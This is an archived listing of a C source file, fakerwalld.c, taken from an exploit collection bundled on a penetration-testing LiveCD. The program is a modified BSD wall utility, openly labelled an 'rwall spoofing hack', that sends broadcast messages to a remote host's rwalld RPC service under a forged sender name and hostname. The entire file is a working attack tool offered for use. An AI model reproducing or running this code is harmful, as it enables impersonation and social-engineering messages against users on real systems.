Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / rpc / fakerwalld.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 6KB | 197 lines

/* rwall spoofing hack... should compile on most sunos 4.1.x, bsd-like, and * hpux OSes... have fun. * * note: works only on hosts which have rwalld in /etc/inetd.conf */ /* * Copyright (c) 1993 Christopher G. Demetriou * Copyright (c) 1988, 1990 Regents of the University of California. * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint char copyright[] = "@(#) Copyright (c) 1988 Regents of the University of California.\n\ All rights reserved.\n"; #endif /* not lint */ #ifndef lint /*static char sccsid[] = "from: @(#)wall.c 5.14 (Berkeley) 3/2/91";*/ static char rcsid[] = "$Id: fakerwalld.c,v 1.1.1.1 2005/02/12 19:38:35 loni Exp $"; #endif /* not lint */ /* * This program is not related to David Wall, whose Stanford Ph.D. thesis * is entitled "Mechanisms for Broadcast and Selective Broadcast". */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <time.h> #include <sys/param.h> #include <sys/types.h> #include <sys/stat.h> #include <pwd.h> #include <unistd.h> #ifdef sony_news #include <sys/time.h> #endif #include <rpc/rpc.h> #include <rpcsvc/rwall.h> #if (defined ultrix) || (defined hpux) #define mkstemp mktemp #endif #define _PATH_TMP "/usr/tmp" struct timeval timeout = { 25, 0 }; int mbufsize; char *mbuf; void makemsg (); int main(argc, argv) int argc; char **argv; { char *wallhost, res; CLIENT *cl; if ((argc < 4) || (argc > 5)) { fprintf(stderr, "usage: %s hostname fakeuser fakehost [file]\n", argv[0]); exit(1); } wallhost = argv[1]; makemsg(argv[4], argv[2], argv[3]); /* * Create client "handle" used for calling MESSAGEPROG on the * server designated on the command line. We tell the rpc package * to use the "tcp" protocol when contacting the server. */ cl = clnt_create(wallhost, WALLPROG, WALLVERS, "udp"); if (cl == NULL) { /* * Couldn't establish connection with server. * Print error message and die. [2000]*/ clnt_pcreateerror(wallhost); exit(1); } if (clnt_call(cl, WALLPROC_WALL, xdr_wrapstring, &mbuf, xdr_void, &res, timeout) != RPC_SUCCESS) { /* * An error occurred while calling the server. * Print error message and die. [2000]*/ clnt_perror(cl, wallhost); exit(1); } exit(0); } void makemsg(fname,uname,hname) char *fname, *uname, *hname; { struct tm *lt; struct passwd *pw; struct stat sbuf; time_t now; FILE *fp; int fd; char *whom, *hostname, lbuf[100], tmpname[32]; (void)strcpy(tmpname, _PATH_TMP); (void)strcat(tmpname, "/wall.XXXXXX"); if (!(fd = mkstemp(tmpname)) || !(fp = fdopen(fd, "r+"))) { (void)fprintf(stderr, "wall: can't open temporary file.\n"); exit(1); } (void)unlink(tmpname); whom = uname; hostname = hname; (void)time(&now); lt = localtime(&now); /* * all this stuff is to blank out a square for the message; * we wrap message lines at column 79, not 80, because some * terminals wrap after 79, some do not, and we can't tell. * Which means that we may leave a non-blank character * in column 80, but that can't be helped. */ (void)fprintf(fp, "Remote Broadcast Message from %s@%s\n", whom, hostname); (void)fprintf(fp, " (%s) at %d:%02d ...\n", ttyname(2), lt->tm_hour, lt->tm_min); putc('\n', fp); if (fname && !(freopen(fname, "r", stdin))) { (void)fprintf(stderr, "wall: can't read %s.\n", fname); exit(1); } while (fgets(lbuf, sizeof(lbuf), stdin)) fputs(lbuf, fp); rewind(fp); if (fstat(fd, &sbuf)) { (void)fprintf(stderr, "wall: can't stat temporary file.\n"); exit(1); } mbufsize = sbuf.st_size; if (!(mbuf = malloc((u_int)mbufsize))) { (void)fprintf(stderr, "wall: out of memory.\n"); exit(1); } if (fread(mbuf, sizeof(*mbuf), mbufsize, fp) != mbufsize) { (void)fprintf(stderr, "wall: can't read temporary file.\n"); exit(1); } (void)close(fd); } /* www.hack.co.za [2000]*/